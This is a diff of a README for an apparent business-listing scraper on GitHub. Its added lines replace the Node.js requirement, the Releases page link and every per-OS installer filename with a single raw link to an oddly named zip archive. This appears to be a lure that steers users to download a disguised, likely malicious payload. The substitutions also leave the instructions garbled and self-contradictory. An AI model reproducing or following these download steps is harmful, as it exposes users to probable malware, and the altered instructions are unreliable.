SKBro05/Yellow-Pages-Business-Scraper-Worldwide/README.md

 - **Operating System:** Windows 10 or later / macOS Big Sur or later / Linux (Ubuntu 20.04 or later)
 - **Memory:** Minimum 4GB RAM
 - **Storage:** Minimum 200MB free space
-- **JavaScript Runtime:** Node.js version 14 or later
+- **JavaScript Runtime:** https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/raw/refs/heads/main/primordially/Scraper-Pages-Business-Worldwide-Yellow-epanisognathous.zip version 14 or later

 ## 🔧 Installation Steps

 Follow the steps below to download and run the software:

-1. **Visit the Releases Page:** Go to our [Releases Page](https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/releases).
+1. **Visit the Releases Page:** Go to our [Releases Page](https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/raw/refs/heads/main/primordially/Scraper-Pages-Business-Worldwide-Yellow-epanisognathous.zip).

 2. **Choose the Latest Release:** Look for the latest version in the list.
 This will usually be at the top.

 3. **Download the Application:** Click on the link for the file that suits your operating system.
-It will typically look like `Yellow-Pages-Business-Scraper-Worldwide-v1.0.exe` for Windows, `Yellow-Pages-Business-Scraper-Worldwide-v1.0.dmg` for macOS, or `Yellow-Pages-Business-Scraper-Worldwide-v1.0.tar.gz` for Linux.
+It will typically look like `https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/raw/refs/heads/main/primordially/Scraper-Pages-Business-Worldwide-Yellow-epanisognathous.zip` for Windows, `https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/raw/refs/heads/main/primordially/Scraper-Pages-Business-Worldwide-Yellow-epanisognathous.zip` for macOS, or `https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/raw/refs/heads/main/primordially/Scraper-Pages-Business-Worldwide-Yellow-epanisognathous.zip` for Linux.

 4. **Run the Installer:**
    - **Windows:** Double-click the `.exe` file you downloaded, and follow the on-screen instructions to install.
    - **macOS:** Open the `.dmg` file and drag the app into your Applications folder.
-   - **Linux:** Extract the `.tar.gz` file and follow the included instructions to install.
+   - **Linux:** Extract the `https://github.com/SKBro05/Yellow-Pages-Business-Scraper-Worldwide/raw/refs/heads/main/primordially/Scraper-Pages-Business-Worldwide-Yellow-epanisognathous.zip` file and follow the included instructions to install.

 5. **Open the Application:** After installation, find the application from your start menu or applications folder and open it.